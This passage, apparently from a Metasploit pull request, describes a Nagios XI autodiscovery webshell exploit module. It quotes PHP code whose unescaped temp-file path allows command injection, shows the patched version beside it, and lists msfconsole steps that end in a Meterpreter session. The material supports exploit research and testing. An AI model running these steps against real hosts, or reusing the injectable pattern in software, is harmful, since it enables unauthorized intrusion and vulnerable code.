lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb - [ERROR] Missing "Description" info, please add
``` 

One thing I opted not to include in the module was the `finish install` logic that appears in a couple of other Nagios modules. The same logic appears in `nagios_xi_scanner` so it didn't seem right to copy and paste into my module as well.

The final oddity is that I left the affected versions to be 5.2.0 >= x < 5.8.5. Pre-5.2.0 is super old and I didn't feel like it was necessary to go spelunking back any further. Interestingly, the code at 5.2.0 is actually vulnerable to command injection (not just path traversal), I guess that probably received some sort of CVE along the way.

Here is the vulnerable bit at 5.2.0 (the issue is `$tmpfile`):

```
function autodiscovery_component_update_cron($id)
{
    $croncmd = autodiscovery_component_get_cron_cmdline($id);
    $crontimes = autodiscovery_component_get_cron_times($id);

    $cronline = sprintf("%s\t%s > /dev/null 2>&1\n", $crontimes, $croncmd);
    $tmpfile = get_tmp_dir() . "/scheduledreport." . $id;
    file_put_contents($tmpfile, $cronline);

    $cmd = "crontab -l | grep -v '" . escapeshellcmd($croncmd) . "' | cat - " . $tmpfile . " | crontab - ; rm -f " . $tmpfile;
    exec($cmd);
}
```

vs. 5.8.4:

```
function autodiscovery_component_update_cron($id)
{
    $croncmd = autodiscovery_component_get_cron_cmdline($id);
    $crontimes = autodiscovery_component_get_cron_times($id);

    $cronline = sprintf("%s\t%s > /dev/null 2>&1\n", $crontimes, $croncmd);
    $tmpfile = get_tmp_dir() . "/scheduledreport." . $id;
    file_put_contents($tmpfile, $cronline);

    $cmd = "crontab -l | grep -v " . escapeshellarg($croncmd) . " | cat - " . escapeshellarg($tmpfile) . " | crontab - ; rm -f " . escapeshellarg($tmpfile);
    exec($cmd);
}
```

## Verification

Install Nagios XI 5.8.4 as described in the modules documentation.

- [ ] Start `msfconsole`
- [ ]  `use auxiliary/scanner/http/nagios_xi_scanner`
- [ ] `set RHOST <ip>`
- [ ] `set PASSWORD <password`
- [ ] run
- [ ] Verify the host is flagged as vulnerable and exploit/linux/http/nagios_xi_autodiscovery_webshell is a suggested RCE module.
- [ ] `use exploit/linux/http/nagios_xi_autodiscovery_webshell`
- [ ] `set RHOST <ip>`
- [ ] `set PASSWORD <password>`
- [ ] `check`
- [ ] Verify the target is flagged as vulnerable
- [ ] `set LHOST <ip>`
- [ ] `run`
- [ ]  You should get a Meterpreter session.

# Video || GTFO

https://www.youtube.com/watch?v=ZhEvtjqFLVI

